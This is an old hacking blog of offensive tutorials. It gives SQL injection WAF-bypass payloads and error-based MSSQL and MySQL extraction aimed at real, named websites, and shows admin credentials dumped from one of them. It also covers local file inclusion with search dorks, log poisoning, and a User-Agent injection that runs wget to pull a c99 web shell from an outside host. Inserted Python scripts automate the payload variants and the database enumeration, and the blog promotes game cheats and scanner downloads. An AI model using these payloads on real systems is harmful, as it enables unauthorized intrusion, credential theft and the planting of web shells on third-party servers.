Saturday 19 January 2013

Hard WAF bypass tips

Whitespace alternatives (for filters that key on the space between keywords):

union(select(0),version(),(0),(0),(0),(0),(0),(0),(0))

%0Aunion%0Aselect%0A1,2,3--

/**/union/**/select/**/1,2,3--

For example:

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%20%28select%201,2,version%28%29,4,5,6,7,8%29%20-- 

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bypassing keyword filters on UNION / SELECT:

(Double keyword, for filters that delete the matched word once instead of blocking): UNIunionON+SELselectECT

+union+distinct+select+

+union+distinctROW+select+

union+/*!select*/+1,2,3

union/**/select/**/1,2,3

uni<on all sel<ect

%20union%20/*!select*/%20

/**//*!union*//**//*!select*//**/

union%23aa%0Aselect

/**/union/*!50000select*/

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/

+%23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+

id=1+'UnI"On'+'SeL"ECT' <- MySQL only

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

For example:

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20union%23aa%0Aselect%201,2,version%28%29,4,5,6,7,8%20-- 

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20/**/union/*!50000select*/%201,2,version%28%29,4,5,6,7,8%20-- 

PHP Code:
http://www.goavenues.com/list_itinerary.php?id=-4%20/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/%201,2,version%28%29,4,5,6,7,8%20-- 
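The following script is an added example, not part of the original post: it generates the comment, newline and keyword variants listed above for a base union select payload, runs each one past a toy blacklist rule of the kind these tricks defeat, and then past a normalising check that URL-decodes and strips MySQL comments before matching, which is what a defender should do. The regex rule, the base payload and the strip-once filter model are assumptions for illustration, not any real WAF's rules.

```python
import re
from urllib.parse import unquote

BASE = "union select 1,2,3"   # constructed base payload

def variants(payload: str) -> dict:
    """Rewrite a 'union select ...' payload with the tricks listed in the post."""
    union, select, rest = payload.split(" ", 2)
    return {
        "plain":          f"{union} {select} {rest}",
        "inline_comment": f"/**/{union}/**/{select}/**/{rest}",
        "versioned":      f"/**/{union}/*!50000{select}*/ {rest}",
        "hash_newline":   f"{union}%23aa%0A{select} {rest}",
        "mixed_case":     f"{union.upper()} /*!{select.capitalize()}*/ {rest}",
        "double_keyword": f"UNI{union}ON SEL{select}ECT {rest}",
    }

# Toy blacklist rule (assumed, not any real WAF): the two keywords joined by whitespace.
NAIVE = re.compile(r"\bunion\s+select\b", re.IGNORECASE)

def naive_filter_blocks(payload: str) -> bool:
    """What a rule that matches the raw request string sees."""
    return NAIVE.search(payload) is not None

def normalise(payload: str) -> str:
    """Defender-side canonicalisation before matching: URL-decode (twice, for the
    %252f trick), unwrap /*!NNNNN ... */ keeping the inner text, drop plain /* */
    comments, drop # and -- comments up to the newline, collapse whitespace."""
    s = unquote(unquote(payload))
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"(#|--)[^\n]*\n", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()

def normalised_filter_blocks(payload: str) -> bool:
    return NAIVE.search(normalise(payload)) is not None

def strip_once(payload: str) -> str:
    """Model of a filter that *deletes* each blacklisted word once instead of
    blocking the request; this is the behaviour the double-keyword trick relies on."""
    for kw in ("union", "select"):
        payload = re.sub(kw, "", payload, count=1, flags=re.IGNORECASE)
    return payload

def evaluate(payload: str = BASE) -> dict:
    """variant name -> (blocked by the raw rule?, blocked after normalising?)"""
    return {name: (naive_filter_blocks(v), normalised_filter_blocks(v))
            for name, v in variants(payload).items()}

if __name__ == "__main__":
    for name, (naive, normed) in evaluate().items():
        print(f"{name:15} raw:{'BLOCK' if naive else 'pass'}  normalised:{'BLOCK' if normed else 'pass'}")
    print("double keyword after a strip-once filter:", strip_once(variants(BASE)["double_keyword"]))
```

Every comment-based variant slips past the raw rule and is caught once the request is normalised; the double-keyword variant is caught by neither, because it targets filters that delete the matched word rather than block the request, which is what strip_once() models (stripping union and select once from UNIunionON SELselectECT leaves UNION SELECT).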

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Making the original row disappear with a false condition after the id, e.g. id=1+/*!and*/+1=0, so the UNION row is the one displayed. Other forms:


+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)


=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Making the original query return no rows (so the UNION result is shown):
=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
id=-1 union all select

id=null union all select

id=1+and+false+union+all+select

id=9999 union all select

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Bypassing filters on information_schema / table_name (wrap the names in versioned comments):

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
/*!table_name*/

+from /*!information_schema*/./*!tables*/ where table_schema=database()


=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)


For example:

PHP Code:
http://www.westbury.com/article.php?article_id=-117%20union%20select%201,2,unhex%28hex%28Concat%28Column_Name,0x3e,Table_schema,0x3e,table_Name%29%29%29,4,5,6,7/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char%2837,%20112,%2097,%20115,%20115,%2037%29--

user_passwd>westbur6_website>user_info

=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Other wrappers for the extracted column (useful when the output is mangled or the filter keys on the encoding):

convert(<expr> using ascii) or unhex(hex(<expr>))

For example:
PHP Code:
www.westbury.com/article.php?article_id=-117 union select 1,2,convert(group_concat(table_name) using ascii),4,5,6,7+from+information_schema.tables--

If 'ascii' doesn't work, try another character set name:

PHP Code:
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2312
armscii8
ascii
binary
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8 

Trick to make the output visible when the injected column is printed inside an HTML tag (here an img src attribute):

PHP Code:
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

Use it when the injected column lands inside an HTML tag. Here 0x223e3c62723e decodes to "><br> (closing the attribute and the tag so the value is rendered as text) and 0x3c696d67207372633d22 to <img src=" (reopening a tag so the rest of the markup stays valid).
It is not always an img tag; it could be an <a>, a </noscript> or anything else, so adjust the bytes to the surrounding markup.

For example:

PHP Code:
http://fzszy.chinacourt.org/public/detail.php?id=-168' union /*!%53elect*/ concat(0x223e3c2f613e3c2f74643e,version(),0x3c6120687265663d22)--+

Here %53elect is SELECT with a URL-encoded S, 0x223e3c2f613e3c2f74643e decodes to "></a></td> and 0x3c6120687265663d22 to <a href=", so version() is printed between the closed anchor and a new one.

SQL injector by zerocool

Source :

download


Thursday 10 January 2013

SQLi scanner (automatic column count) + multithreaded


Link to use scanner :
http://zerocoolhf.allalla.com/

If you want to see the source code of the two files, download it.
Download link :
http://tinyurl.com/azhtkab

Wednesday 9 January 2013

Bypass subquery returns more than 1 row

Hi everyone, today I'll show you a SQLi tip: getting a large amount of data in one request using the substr() function. Paging with LIMIT is slow, so I'm going to show how to get around error 1242, "Subquery returns more than 1 row".

I) Using substr function
==

The substr() function is usually used for blind injection, but we can also use it to get around the length limit of group_concat() and error 1242.
For example:

Code:
http://www.lermitagehotel.ee/?pageid=160 +and+(select+1+from+(select+count(*),concat((select(select+concat(concat(user_name,0x3a,user_pass),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
error 1242-
Subquery returns more than 1 row.
We can use substr() like this:
Code:
And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(column1,0x3a,column2),1,150)
from table where table_schema like database()),0x3a,floor(rand(0)*2))x
from information_schema.tables group by x)z)-- -
So:
Code:
http://www.lermitagehotel.ee/?pageid=160 And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(table_name),1,150)from information_schema.tables where table_schema like database()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -
The result:
Quote:Duplicate entry ':admin_topmenu,album_photos,albums,defaults,form_items,form_log,' for key 'group_key'

Increase the start offset to get the next piece: substr(group_concat(table_name),1,150), then substr(group_concat(table_name),151,150), and so on (the second argument is the 1-based start, the third the length). Note that the Duplicate entry message only shows the first 64 characters of the key, so you actually see about 63 characters of data per request whatever length you ask for; step the start offset by the number of characters you actually received.
--
On MySQL 5+:
Code:
or 1 group by concat_ws(0x3a,(select substr(group_concat(column),1,150)
from table),floor(rand(0)*2)) having min(0) or 1-- -
--
On MySQL 5.1+:
Code:
and updatexml(0,concat(0x3a,(select substr(group_concat(column),1,150)
from table)),0)-- -
--
Note: sometimes the second query doesn't work, so fall back to the first one.
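An added example (not from the original post) that scripts the paging above against a simulated target. The fake table list and the response format are constructed here; the 64-character limit is MySQL's own truncation of the key in ER_DUP_ENTRY messages, which is why the screenshot above shows only 63 characters of data even though the substr() asked for 150. Function names and the paging logic are mine.

```python
import re
from typing import Tuple

# Constructed stand-in for what group_concat(table_name) returns on the target;
# the first 63 characters are the ones the post's error message shows.
FAKE_TABLES = ("admin_topmenu,album_photos,albums,defaults,form_items,form_log,"
               "gallery,news,pages,users,user_sessions,widgets")

MAX_SHOWN = 64   # MySQL's ER_DUP_ENTRY message shows at most 64 chars of the key
DUP_RE = re.compile(r"Duplicate entry '(.*)' for key 'group_key'")

def payload(start: int, length: int) -> str:
    """The post's query with the substr() window filled in (1-based start)."""
    return ("And(select 1 from(select count(*),concat(0x3a,(select "
            f"substr(group_concat(table_name),{start},{length}) "
            "from information_schema.tables where table_schema like database()),"
            "0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -")

def fake_server(start: int, length: int, data: str = FAKE_TABLES) -> str:
    """Simulated DBMS: the GROUP BY key is ':' + chunk + ':' + floor value,
    and the error text truncates it to MAX_SHOWN characters."""
    chunk = data[start - 1:start - 1 + length]
    key = f":{chunk}:1"
    return f"Duplicate entry '{key[:MAX_SHOWN]}' for key 'group_key'"

def parse_chunk(response: str) -> Tuple[str, bool]:
    """Return (data shown, whole window fit).  When the ':1' tail is present the
    key was not truncated; otherwise only a trailing ':' can be our delimiter
    (identifiers never contain ':'), so strip it and treat the rest as data."""
    m = DUP_RE.search(response)
    if not m:
        raise ValueError("response carries no duplicate-entry error")
    key = m.group(1)[1:]                      # drop the leading ':' delimiter
    if key.endswith(":1"):
        return key[:-2], True
    return key.rstrip(":"), False

def dump(length: int = 150, send=fake_server) -> Tuple[str, int]:
    """Reassemble the whole string.  The start offset advances by the number of
    characters actually displayed, not by `length`, because of the truncation."""
    out, start, requests = "", 1, 0
    while True:
        shown, fit = parse_chunk(send(start, length))
        requests += 1
        out += shown
        if fit and len(shown) < length:       # window fit and was not full: done
            return out, requests
        start += len(shown)

if __name__ == "__main__":
    print(fake_server(1, 150))
    print(payload(64, 150))
    print(dump())
```

With length=150 the first response is cut at 63 data characters, so the second request has to start at offset 64, not 151; dump() derives that from what came back instead of from the length requested.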

II) Using concat() and group_concat()
==
Code:
and updatexml(0,concat(0x3a,(select concat(0x3a,group_concat(column))
from table)),0)-- -
This form only works inside extractvalue()/updatexml(), and their XPATH error shows at most 32 characters, so for longer results you still need the substr() paging from above.

Tuesday 8 January 2013

Counter Strike MultiHack Tools

Counter Strike MultiHack Tools
Features:
Wallhack
Nosmoke
EspBox
FullBright
Noflash
HeadShot Helper
SpeedHack
Sv_cheats bypass
Others

Status:
VAC³ - Undetected
De_Tocs - Undetected (unless sv_cheats bypass activation)
KAC - Undetected (unless sv_cheats bypass activation)
zBlock - Undetected (unless sv_cheats bypass activation)
ServSecurity - Undetected
DBlocker - Undetected
SourceMod AntiCheat - Undetected
ESL Wire - Detected

CSHack is compatible with all Windows versions (XP/Vista/7/8).
.NET Framework 4.0 is needed to run CSHack.
 

Download


Runescape Multi Hack tool v1

As the name says, this cheat gives you multiple hacks bundled together. It has a built-in counter so that it does not give you more than a few million gold a day, because if it gave you more the game would be useless and you would get caught. And the best part is that this program is 100% secure! Enjoy!



Download

Sunday 6 January 2013

mssql server injection tutorial [pics]

This is how I injected an MSSQL-backed .aspx site.

Vulnerable link: http://ogis.edu.in/ViewPhoto.aspx?gid=46

1st way:
Finding version:

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=cast(@@version as int)

Finding database:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 or 1=convert(int,db_name())

I will not go deep into this method; there is already a tutorial about it here.

2nd way:
1. Finding the number of columns:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 1-- -

It loads normally. That's good.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 10-- -
output:
[Image: 54025460.jpg]

So let's reduce it:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 order by 9-- -

The page loads normally, so there are 9 columns.

2. Next we do UNION ALL SELECT.
With MSSQL behind ASP.NET the numbered columns often are not reflected on the page, so you have to find the injectable column by hand.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 54898417.jpg]

Don't worry, there are two ways from here.

1st way (easy): this works only rarely and is the normal injection.

Just change gid=46 to gid=-46.
So the injection will be:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -
output:
[Image: 50983947.jpg]

Vulnerable column = 2
version=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,@@version,3,4,5,6,7,8,9-- -
@@version gives the version in MSSQL.
Remember that version() is MySQL syntax and will not work here.

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,user_name(),3,4,5,6,7,8,9-- -

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(),3,4,5,6,7,8,9-- -
db_name() gives the current database.

Now replace db_name() with db_name(1), db_name(2), ..., db_name(n) to walk the databases by id (it returns NULL once the id does not exist).
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(1),3,4,5,6,7,8,9-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,db_name(11),3,4,5,6,7,8,9-- -

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,schema_name,3,4,5,6,7,8,9 from information_Schema.schemata-- -
On SQL Server 2000 this listed all databases in one go (its INFORMATION_SCHEMA.SCHEMATA had one row per database); on SQL Server 2005 and later SCHEMATA lists the schemas of the current database instead, so use the name column of master..sysdatabases or sys.databases for the database list.
[Image: 93957090.jpg]

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,table_name,3,4,5,6,7,8,9 from information_Schema.tables where table_schema!=db_name()-- -
In SQL Server information_schema.tables.table_schema is the schema (usually dbo), not the database (that is table_catalog), so this filter does not exclude anything; it simply lists the tables of the current database. To list another database's tables query otherdb.information_schema.tables.
The interesting table here is o_adminmst.
[Image: 82377563.jpg]

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,column_name,3,4,5,6,7,8,9 from information_Schema.columns where table_name='o_adminmst'-- -
[Image: 53670075.jpg]

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,username,3,4,5,6,7,8,9 from o_adminmst-- -
username=admin
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=-46 UNION all SELECT 1,password,3,4,5,6,7,8,9 from o_adminmst-- -
pass=admin123#.

2nd way (important): this works with UNION on many sites and challenges.
Let's say you are stuck here:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT 1,2,3,4,5,6,7,8,9-- -

Now replace all columns with NULL,
so it looks like this:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT null,null,null,null,null,null,null,null,null-- -

Now start replacing each null in turn with convert(int,@@version) or cast(@@version as int).

In my case replacing the first null gives the answer:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,@@version),null,null,null,null,null,null,null,null-- -
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(@@version as int),null,null,null,null,null,null,null,null-- -
[Image: 52115856.jpg]

user=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(user_name() as int),null,null,null,null,null,null,null,null-- -
output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

You can also use current_user , user , system_user instead of user_name() .

database=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT cast(db_name() as int),null,null,null,null,null,null,null,null-- -

output=
Conversion failed when converting the nvarchar value 'db_ogis' to data type int.

Tables=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name())) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_updatemst' to data type int.

For the next table, exclude the one already found:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 table_name from information_schema.tables where table_schema!=db_name() and table_name<>'o_updatemst')) ,null,null,null,null,null,null,null,null-- -

output=Conversion failed when converting the nvarchar value 'o_pagemaster' to data type int.

columns=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'adminid' to data type int.

For the next column, same as with the tables:
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 column_name from information_schema.columns where table_name='o_adminmst' and column_name<>'adminid')) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the nvarchar value 'username' to data type int.

data=
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin' to data type int.

Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 password from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin123#' to data type int.

You can use %2b to get the username and password in one request.
%2b is the URL-encoded +, the T-SQL string concatenation operator.
Code:
http://ogis.edu.in/ViewPhoto.aspx?gid=46 UNION all SELECT convert(int,(select top 1 username%2b'/'%2bpassword from o_adminmst)) ,null,null,null,null,null,null,null,null-- -

Conversion failed when converting the varchar value 'admin/admin123#' to data type int.
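Added example, not part of the original tutorial: it automates the second method's convert(int,(select top 1 ...)) walk. Each request asks for the first value not yet seen (the same idea as the tutorial's chained table_name<>'...' clauses, written as NOT IN), SQL Server leaks the value in the conversion error, and the parser pulls it out. The database contents are a constructed stand-in using the names from the tutorial; the URL shape and nine-column layout are the tutorial's, the function names are mine.

```python
import re
from typing import List, Optional

# What SQL Server says when a string is forced into an int (varchar or nvarchar).
CONV_RE = re.compile(r"Conversion failed when converting the n?varchar value '(.*?)' to data type int\.")

# Constructed stand-in for the remote database: table -> {table_name filter -> values}.
FAKE_DB = {
    "information_schema.tables":  {"": ["o_updatemst", "o_pagemaster", "o_adminmst"]},
    "information_schema.columns": {"o_adminmst": ["adminid", "username", "password"]},
    "o_adminmst":                 {"": ["admin"]},
}

def sql_quote(value: str) -> str:
    """Literal for a single-quoted T-SQL string."""
    return "'" + value.replace("'", "''") + "'"

def next_value_query(column: str, table: str, seen: List[str], where: str = "") -> str:
    """convert(int,(select top 1 <column> from <table> where ... and <column> not in (...)))
    - the tutorial's chained  and table_name<>'...'  clauses, generated."""
    conds = [where] if where else []
    if seen:
        conds.append(f"{column} not in ({','.join(sql_quote(s) for s in seen)})")
    where_sql = (" where " + " and ".join(conds)) if conds else ""
    return f"convert(int,(select top 1 {column} from {table}{where_sql}))"

def injected_url(expr: str, base: str = "http://ogis.edu.in/ViewPhoto.aspx?gid=46", ncols: int = 9) -> str:
    """Put the expression in the first UNION column and NULL in the other eight."""
    return f"{base} UNION all SELECT {expr},{','.join(['null'] * (ncols - 1))}-- -"

def parse_leak(body: str) -> Optional[str]:
    m = CONV_RE.search(body)
    return m.group(1) if m else None

def fake_server(expr: str) -> str:
    """Stand-in for the vulnerable page: resolve the subquery against FAKE_DB,
    honour the not-in list, and answer as SQL Server would."""
    col, table = re.search(r"select top 1 (\w+) from ([\w.]+)", expr).groups()
    tname = re.search(r"table_name='(\w+)'", expr)
    rows = FAKE_DB.get(table, {}).get(tname.group(1) if tname else "", [])
    excl = re.search(r"not in \((.*)\)\)\)$", expr)
    seen = [s.strip("'") for s in excl.group(1).split(",")] if excl else []
    for value in rows:
        if value not in seen:
            return f"Conversion failed when converting the nvarchar value '{value}' to data type int."
    return "<html>normal page</html>"      # subquery returned NULL: no error, nothing leaked

def enumerate_values(column: str, table: str, where: str = "", send=fake_server, limit: int = 200) -> List[str]:
    """Repeat 'give me the first value I have not seen yet' until the error goes away."""
    seen: List[str] = []
    while len(seen) < limit:
        leaked = parse_leak(send(next_value_query(column, table, seen, where)))
        if leaked is None or leaked in seen:
            break
        seen.append(leaked)
    return seen

if __name__ == "__main__":
    tables = enumerate_values("table_name", "information_schema.tables")
    print(tables)
    print(enumerate_values("column_name", "information_schema.columns", "table_name='o_adminmst'"))
    print(injected_url(next_value_query("table_name", "information_schema.tables", tables[:1])))
```

Against a real target, replace fake_server with a function that sends injected_url(expr) and returns the response body; the loop stops when the page comes back without a conversion error, which is how SQL Server signals that TOP 1 found nothing left.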

That's it.

[TUT]Ultimate Local File Injection(lfi) [pics/highly detailed]


1. What is LFI?
2. Finding LFI vulnerabilities
3. Exploiting LFI vulnerabilities
-/proc/self/environ
-/proc/self/fd
- Log poisoning
- wrapper php://filter
- wrapper data://



1.0 What is LFI?

Code:
LFI stands for Local File Inclusion, a type of web-application vulnerability in which a script includes a file whose path is controlled by the user. It is only one of many web-application vulnerabilities. Web applications are the pages/websites you view and interact with in your web browser.

2. Finding LFI vulnerabilities
It is easy to find.
First lets take a look at a php code that is vulnerable to LFI:
PHP Code:
<?php
$page = $_GET['page'];   // user-controlled, never validated
include($page);          // vulnerable: includes whatever path the user supplied
?>
This is a piece of code that should NEVER be used, because $page isn't sanitized and is passed straight to include(), but unfortunately it is very common to find on the web.

Now To check for the most basic vulnerabilities all you need to do is manipulate the GET arguments and look for error messages.
Let's see it:
Normal link : http://www.site.com/ru/page.php?d=1
Injection link : http://www.bid-qualitysummit.com/ru/page.php?d=1asdfgd
Output:
[Image: 454qk.jpg]
You will not always get an error message. Sometimes the script redirects you to the home page or similar when it detects an error.

Dorks:
Code:
inurl:index.php?page=index.php
inurl:index.php?page=sitemap.php
inurl:index.php?page=awards.php
inurl:index.php?page=book.php
inurl:index.php?page=store.php
inurl:index.php?page=items.php
inurl:index.php?page=feedback.php
inurl:index.php?page=welcome.php
inurl:index.php?page=advertise.php
inurl:index.php?page=festival.php
inurl:index.php?page=band.php
inurl:index.php?page=musicians.php
inurl:index.php?page=artist.php
inurl:index.php?page=archive.php
inurl:index.php?page=facilities.php
inurl:index.php?page=activies.php
inurl:index.php?page=bio.php
inurl:index.php?page=biography.php
inurl:index.php?page=menu.php
inurl:index.php?page=profile.php
inurl:index.php?page=terms.php
inurl:index.php?page=tos.php
inurl:index.php?page=screenshots.php
inurl:index.php?page=plans.php
inurl:index.php?page=templates.php
inurl:index.php?page=browse.php
inurl:index.php?page=shows.php
inurl:index.php?page=dining.php
inurl:index.php?page=media.php
inurl:index.php?page=offers.php
inurl:index.php?page=photogallery.php
inurl:index.php?page=schools.php
inurl:index.php?page=rates.php
inurl:index.php?page=buy.php
inurl:index.php?page=pricing.php
inurl:index.php?page=web.php
inurl:index.php?page=cms.php
inurl:index.php?page=sponsors.php
inurl:index.php?page=login.php
inurl:index.php?page=admin.php
inurl:index.php?page=register.php
inurl:index.php?page=signin.php
inurl:index.php?page=signup.php
inurl:index.php?page=artikel.php
inurl:index.php?page=kontakt.php
inurl:index.php?page=directions.php
inurl:index.php?page=farm.php
inurl:index.php?page=resume.php
inurl:index.php?page=products.php
inurl:index.php?page=music.php
inurl:index.php?page=agenda.php
inurl:index.php?page=faculty.php
inurl:index.php?page=overview.php
inurl:index.php?page=research.php
inurl:index.php?page=publications.php
inurl:index.php?page=outreach.php
inurl:index.php?page=education.php
inurl:index.php?page=regulatoins.php



3. Exploiting LFI vulnerabilities
There are 5 methods:
  • /proc/self/environ
  • /proc/self/fd (I will update it later)
  • log poisoning
  • using the wrapper php://filter
  • using the wrapper data://

/proc/self/environ

Lets say that you have successfully found a vulnerable page.
The URL is http://www.site.com/index.php?page=index
Now replace index with /etc/passwd so it will look like this
Code:
www.site.com/index.php?page=/etc/passwd
If you get an error like "No such file or directory", go up one directory at a time with ../:
Code:
../etc/passwd  ../../etc/passwd  ../../../etc/passwd
and so on.
If plain /etc/passwd works and you are lucky, you will get this:
[Image: etcpass.jpg]
Now thats good. You can include files from server.

Now replace /etc/passwd with /proc/self/environ
so your url will look like this :
Code:
www.site.com/index.php?page=/proc/self/environ
If it shows something like this, you are on your way:
[Image: procself.jpg]
Now install the Tamper Data add-on for Firefox.

Go to tools - tamper data
it will look like this
[Image: tamperdata.jpg]
Your page should still be /proc/self/environ.
Click Start Tamper and refresh the page.
Tamper Data will pop up and ask whether to tamper the request; click Tamper.
[Image: tamper2.jpg]
In the User-Agent field, type:
PHP Code:
<?php phpinfo();?>
When the page has loaded, you should see something like this if you did it correctly:
[Image: phpinfo.jpg]
Now search for "disable_functions" (Ctrl+F Search function)
Mine is
[Image: disablefunc.jpg]
That is good: exec() is not disabled, so we can spawn our shell now.

Now go back and edit your User-Agent.
Change "User-Agent" to:
PHP Code:
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
wget downloads the shell (hosted as .txt so the remote server serves the source instead of running it) and -O saves it as shell.php in the current working directory of the PHP process, which has to be writable for this to work.

Save it and refresh your site.
Go to
Code:
http://www.site.com/shell.php
or
Code:
www.site.com/index.php?page=shell.php
Voilà, we have our shell up.
Enjoy.

Using log poisoning
Once you know you can include arbitrary files through the LFI, you can try log poisoning to execute PHP code and gain more access to the system.

In order to perform LFI log poisoning you need to be able to include the Apache access or error log. Unfortunately for us, I believe this has been made "impossible" in newer versions of Apache (the most used web server). Nonetheless, it does not stop us from trying.

First, try including various known locations for the apache logs. Here are a few common paths:
Code:
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
/var/log/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log

Let's say we can include /var/www/logs/access.log.
So our URL will be:
Code:
http://www.site.com/index.php?page=/var/www/logs/access.log
It will show the log, looking like this:
Code:
11.11.11.11 - - [05/Feb/2004:21:34:01 -0600] "GET /tindex.php?inc= HTTP/1.1" 200 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:04 -0600] "GET /tindex.php?inc=../../../etc/passwd HTTP/1.1" 200 175 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:07 -0600] "GET /index.php?inc=test.php HTTP/1.1" 200 134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:08 -0600] "GET /index.php?inc=../../../var/www/logs/access.log HTTP/1.1" 200 164 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"

So we can see that the log file also stores our User-Agent,
so we can exploit it through the User-Agent just as with /proc/self/environ.

Let's change the User-Agent to:
PHP Code:
<?php echo 'test'; ?>

Now the output will be:
Code:
